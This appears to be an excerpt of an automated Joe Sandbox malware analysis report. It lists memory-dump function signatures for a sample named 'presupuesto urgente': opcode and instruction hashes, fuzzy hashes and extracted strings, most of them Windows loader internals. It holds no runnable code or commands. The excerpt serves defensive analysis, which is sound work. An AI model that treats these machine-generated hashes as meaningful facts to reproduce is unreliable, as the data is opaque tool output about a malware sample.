                                                                                                                                                      • Instruction Fuzzy Hash: D96115B5C01219EFDB15DFA4C949ADEBBB8FB48704F50805AF805E7200DB759A46CFA0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$$
                                                                                                                                                      • API String ID: 3446177414-233714265
                                                                                                                                                      • Opcode ID: 6e74beb0e60f01d1b866fb41bec9b88c7b8fe8db24acd4c5370aa96df1d3980b
                                                                                                                                                      • Instruction ID: 98f450c69dd355c751375e87d7b95be429dcb7e2ba331f098ca8c3c930a7e708
                                                                                                                                                      • Opcode Fuzzy Hash: 6e74beb0e60f01d1b866fb41bec9b88c7b8fe8db24acd4c5370aa96df1d3980b
                                                                                                                                                      • Instruction Fuzzy Hash: 0161FF75E01749CFEB28CFA8E690BADB7F1BF84314F444529D105EBA90CB74A941CB80
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                      • API String ID: 0-118005554
                                                                                                                                                      • Opcode ID: f64d32cf6379695c67cad611f39d3029cec8e00136997bbfe3f1b2a64fad5790
                                                                                                                                                      • Instruction ID: c4bce0435519db873b8145857ab46fe4d59b0b06419f261f2b4fb15b3057214f
                                                                                                                                                      • Opcode Fuzzy Hash: f64d32cf6379695c67cad611f39d3029cec8e00136997bbfe3f1b2a64fad5790
                                                                                                                                                      • Instruction Fuzzy Hash: 8131DEB52087849FD301CBA8E880B1AB7F4EFE4718F440869E854CB390EB79D905CB52
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: R3$ R3
                                                                                                                                                      • API String ID: 0-1334182836
                                                                                                                                                      • Opcode ID: d7dbb765f322a877c77799722dbd4c67b6f6d6a1ea6ce324069407303dc45dac
                                                                                                                                                      • Instruction ID: 91ec7f8dc07469dbcfd6153a9c14e6df08489f9dfd30f41d4939c074f43be405
                                                                                                                                                      • Opcode Fuzzy Hash: d7dbb765f322a877c77799722dbd4c67b6f6d6a1ea6ce324069407303dc45dac
                                                                                                                                                      • Instruction Fuzzy Hash: 3331E437A067019FD711DE14A880FAB77B5ABC56B0F064829FC96D7210DA34DC018FA1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .Local\$@
                                                                                                                                                      • API String ID: 0-380025441
                                                                                                                                                      • Opcode ID: 3ee906021297b5b05c98a98e9e6d936011c3713b0bf540aa9fc6bba4cb57a55b
                                                                                                                                                      • Instruction ID: e5dab044d4384f1ff316db98ab53076879c8df539b20eb75ab1177b10faca624
                                                                                                                                                      • Opcode Fuzzy Hash: 3ee906021297b5b05c98a98e9e6d936011c3713b0bf540aa9fc6bba4cb57a55b
                                                                                                                                                      • Instruction Fuzzy Hash: 383195B5509301AFD311CF28E880A5BBBF8FFD5658F44192EF99583660D634DD09CB92
                                                                                                                                                      Strings
                                                                                                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 335A289A
                                                                                                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 335A289F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                      • API String ID: 0-2653619699
                                                                                                                                                      • Opcode ID: c5e53fe7fb60de9866e85b3aac35341b2bd3e77d55ae53dd67e3e1e1383b7d68
                                                                                                                                                      • Instruction ID: 439e80657a6981ff95f07fa112ba7d227ee8ee6ff8137f564428734b63e4a2a9
                                                                                                                                                      • Opcode Fuzzy Hash: c5e53fe7fb60de9866e85b3aac35341b2bd3e77d55ae53dd67e3e1e1383b7d68
                                                                                                                                                      • Instruction Fuzzy Hash: 901125B2F00305BBFB1A8A4CEC45F6F76A9DBD4798F648469B904EB254DA74CD0096A0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: MUI
                                                                                                                                                      • API String ID: 0-1339004836
                                                                                                                                                      • Opcode ID: 5f373e3ac37ac9f31cfa028bdf13181296cf9861532a858ae35c7694bea0159d
                                                                                                                                                      • Instruction ID: 3ae4d126c5629eed9bf9be60d54a14d4fd42bce526785a6eb1253a10a0219a98
                                                                                                                                                      • Opcode Fuzzy Hash: 5f373e3ac37ac9f31cfa028bdf13181296cf9861532a858ae35c7694bea0159d
                                                                                                                                                      • Instruction Fuzzy Hash: D6825C79E023088FEB14CFA9E880BDDB7B5FF4A760F548169E859AB250DB309D45CB50
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @[b3@[b3
                                                                                                                                                      • API String ID: 0-3711319441
                                                                                                                                                      • Opcode ID: fa6d3cae7263caf54dd5f75bf1764d0b853e9e299fc2e919c03cbfd49a144faa
                                                                                                                                                      • Instruction ID: 20aa87cc19c8e27e1b7985f8a206b99c4a0df4711816eadf920a0aa78c12e042
                                                                                                                                                      • Opcode Fuzzy Hash: fa6d3cae7263caf54dd5f75bf1764d0b853e9e299fc2e919c03cbfd49a144faa
                                                                                                                                                      • Instruction Fuzzy Hash: E032A2B5E00219DFEF14CF58E844BAEBBB5FF94744F59006AE806AB350E775A901CB90
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9d1eb9a12cc990080bcacaee7a8b567294e7a3b92918b63abd009df3b5ff06fb
                                                                                                                                                      • Instruction ID: 783094d33d2d1264edc7c3623de45d8961b6c663660b1419843d6af7731727af
                                                                                                                                                      • Opcode Fuzzy Hash: 9d1eb9a12cc990080bcacaee7a8b567294e7a3b92918b63abd009df3b5ff06fb
                                                                                                                                                      • Instruction Fuzzy Hash: 7DA12471E41314AFFB11CBA4E844BDEB7B8AF44B54F490662F941EB2A0D774A940CBC4
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 8e5a63e6e2ba433aefd3dcf06133b05605b73b36b28ff3b40233cc6927ca5e58
                                                                                                                                                      • Instruction ID: 82af84c2c5d6e5fff6a1106976c160c9853077addd4ecb47f3f986e12778b65a
                                                                                                                                                      • Opcode Fuzzy Hash: 8e5a63e6e2ba433aefd3dcf06133b05605b73b36b28ff3b40233cc6927ca5e58
                                                                                                                                                      • Instruction Fuzzy Hash: 35B112B5A093808FD354CF28D880A5AFBF1BF89304F584A6EE899CB351D771E945CB42
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 124f6302281c18ec41f209a0e42a2a4d5533a9ae2f47536c2a9e86d53e7f9dee
                                                                                                                                                      • Instruction ID: 5b0eee8b95c82f0adbd7f43d449c6ad79f1e7ec43f721ef1fdcd5aeb0f6c4fff
                                                                                                                                                      • Opcode Fuzzy Hash: 124f6302281c18ec41f209a0e42a2a4d5533a9ae2f47536c2a9e86d53e7f9dee
                                                                                                                                                      • Instruction Fuzzy Hash: FB615275E01606AFDB08CF68E480B9DFBB5BF89754F24856AE419A7340DB30A9518FD0
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: a2cbb77906e114d69f4faa28e325e65f61d9876bc22d27ddccbafccff0222ccf
                                                                                                                                                      • Instruction ID: f1aea2dc8c97f5932dae1fa51d8add16c8968b61b839dbbcd964d73854b207e9
                                                                                                                                                      • Opcode Fuzzy Hash: a2cbb77906e114d69f4faa28e325e65f61d9876bc22d27ddccbafccff0222ccf
                                                                                                                                                      • Instruction Fuzzy Hash: 8641BC71902B04CFD324CF24E950B49B7F5FF86364F55869AC446DBAA0DB30AA41CF41
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 5f73acf06b189db08cc51aa69df7d4b9cd73d0aad7f150891d8fb13925095ac2
                                                                                                                                                      • Instruction ID: 5e6b0f552f2a01a9b35c5d59dec72a4615ef93469336562303f87e037559cd5a
                                                                                                                                                      • Opcode Fuzzy Hash: 5f73acf06b189db08cc51aa69df7d4b9cd73d0aad7f150891d8fb13925095ac2
                                                                                                                                                      • Instruction Fuzzy Hash: F541E4B46013818FD315CF28E894B2ABBE9EF82762F54482DE941872A0DB30D891CB91
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 5aa34c6cbe76541ae9dcded4f7f19a85b04b5c1231d947cff9829d4cb0e83039
                                                                                                                                                      • Instruction ID: 43ee5929ea5366a39926abab4afccaef863530f45aa3a417b9a7d88e174b6eec
                                                                                                                                                      • Opcode Fuzzy Hash: 5aa34c6cbe76541ae9dcded4f7f19a85b04b5c1231d947cff9829d4cb0e83039
                                                                                                                                                      • Instruction Fuzzy Hash: DF319E35616B05FFE7468F24EA80B89BBA5FF852A0F846455E84087E51CB35E831CF80
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: b3b15d9a31e7275b4d175063096e9650e4e475884647cfcc028fa85f0fd9bb75
                                                                                                                                                      • Instruction ID: 53edbd4e18ca6d652245a5367adc49e755e84d09ca43c7742048900239813207
                                                                                                                                                      • Opcode Fuzzy Hash: b3b15d9a31e7275b4d175063096e9650e4e475884647cfcc028fa85f0fd9bb75
                                                                                                                                                      • Instruction Fuzzy Hash: 043187B5945301DFC700DF19E44494ABBF6FF89654F498AAEE488AB221D370DD05CF92
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 62315e526252ccbb76ca5e4071ecec5f18aecfa227a66fa7892b91b5336ac3e1
                                                                                                                                                      • Instruction ID: 410735b5bbfcf4a96168846d31ca303796b66cf790e43525a4fad73aca81e90e
                                                                                                                                                      • Opcode Fuzzy Hash: 62315e526252ccbb76ca5e4071ecec5f18aecfa227a66fa7892b91b5336ac3e1
                                                                                                                                                      • Instruction Fuzzy Hash: 8C21D2356077509FD7229F05E944B1ABBF5EFD2B20F890469E84287691CBB0E848CBD1
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: dbafb8ceb870f5ce00d118741cf3893b2d835ba74d9bc43140c1d647be443d27
                                                                                                                                                      • Instruction ID: 4e678ae5df31f1158a661a484ccb5abea69151768fe3ec1c512562dc43707786
                                                                                                                                                      • Opcode Fuzzy Hash: dbafb8ceb870f5ce00d118741cf3893b2d835ba74d9bc43140c1d647be443d27
                                                                                                                                                      • Instruction Fuzzy Hash: 4001453A511259AFDF129E84D840EDA7FB6FB4C794F068111FE28A6224C736D971EB80
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: d7fa18ff8fe407993f241ae8e5b952c12ff3681f22fc3b1d8b28f8da95fd61f7
                                                                                                                                                      • Instruction ID: 8c1cf1c92b9a657210f9e02f7ef814437b1ba8b80f42135a09ad7ad81b7f7380
                                                                                                                                                      • Opcode Fuzzy Hash: d7fa18ff8fe407993f241ae8e5b952c12ff3681f22fc3b1d8b28f8da95fd61f7
                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0FA32200700AFD731DB09EC08F8ABBFDEFD0B00F08012CA942D3AA0C7A0E909C660
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                      • Instruction ID: 038dcba8267211ba7286357e48135e0d6f733d1a67a3661f062cf1f190b8b8f5
                                                                                                                                                      • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                      • Instruction Fuzzy Hash: DE615FB5D02319ABEF11CF95E840BDEBBB8EF86760F544159E810B7690DB749A01CBA0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: #%u
                                                                                                                                                      • API String ID: 0-232158463
                                                                                                                                                      • Opcode ID: a73c0ae356af611e0c6bc6e8a6ea3f3e1856cfab94ad6abf56f6b25c6a532701
                                                                                                                                                      • Instruction ID: 02cbfa086019cade907581b18f37f0f38ffe5d4e97c55052b8016e7c0abbcb68
                                                                                                                                                      • Opcode Fuzzy Hash: a73c0ae356af611e0c6bc6e8a6ea3f3e1856cfab94ad6abf56f6b25c6a532701
                                                                                                                                                      • Instruction Fuzzy Hash: 7F713AB2E002499FDB05CFA8E980BAEB7F8BF48744F554065E904E7651EB34ED41CB60
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0hb3
                                                                                                                                                      • API String ID: 0-2142295318
                                                                                                                                                      • Opcode ID: b105c4671ee4f17b7adf8a48c2bfb89577387ea5e16097050be846d31931cfa0
                                                                                                                                                      • Instruction ID: ceda4626ea6d23091fef518b0152bd78560844436b68bd9487a98589c7d77193
                                                                                                                                                      • Opcode Fuzzy Hash: b105c4671ee4f17b7adf8a48c2bfb89577387ea5e16097050be846d31931cfa0
                                                                                                                                                      • Instruction Fuzzy Hash: 02412775701720DBD715CA29E890B6FB7AAEFC07A1F848618F815C7690DB37D821C791
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: EXT-
                                                                                                                                                      • API String ID: 0-1948896318
                                                                                                                                                      • Opcode ID: dcf4a7c1287bccda9df58ea7802b18533469b1f7e06a6634bd950c7b961e5e40
                                                                                                                                                      • Instruction ID: 7a472b7434895bdad3988d0a76f7f3ec689e70fb580ecaecfd1a6683ca4a3df5
                                                                                                                                                      • Opcode Fuzzy Hash: dcf4a7c1287bccda9df58ea7802b18533469b1f7e06a6634bd950c7b961e5e40
                                                                                                                                                      • Instruction Fuzzy Hash: 3341CE72909351ABE314CA64F944B6FB7E8AFC8754F840E2DF584E7190EB74CA048792
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                      • Instruction ID: 7e0f036c6e962ae759749babd9f47b86d07b84e2f55a7f8ea2cf879a35ff3d5f
                                                                                                                                                      • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                      • Instruction Fuzzy Hash: 13519EB1504710AFD321CF19D841A6BB7F8FF88710F40892EFA95976A0E7B4E954CB91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: BinaryHash
                                                                                                                                                      • API String ID: 0-2202222882
                                                                                                                                                      • Opcode ID: 851892ada8c072fd0f938d4b06f928fe18c0877bdf1d7eebc56b8dde445e062a
                                                                                                                                                      • Instruction ID: 25028c80fa5ed43162d6a426472513c1cbe3315bda105c77a0749e856307f42b
                                                                                                                                                      • Opcode Fuzzy Hash: 851892ada8c072fd0f938d4b06f928fe18c0877bdf1d7eebc56b8dde445e062a
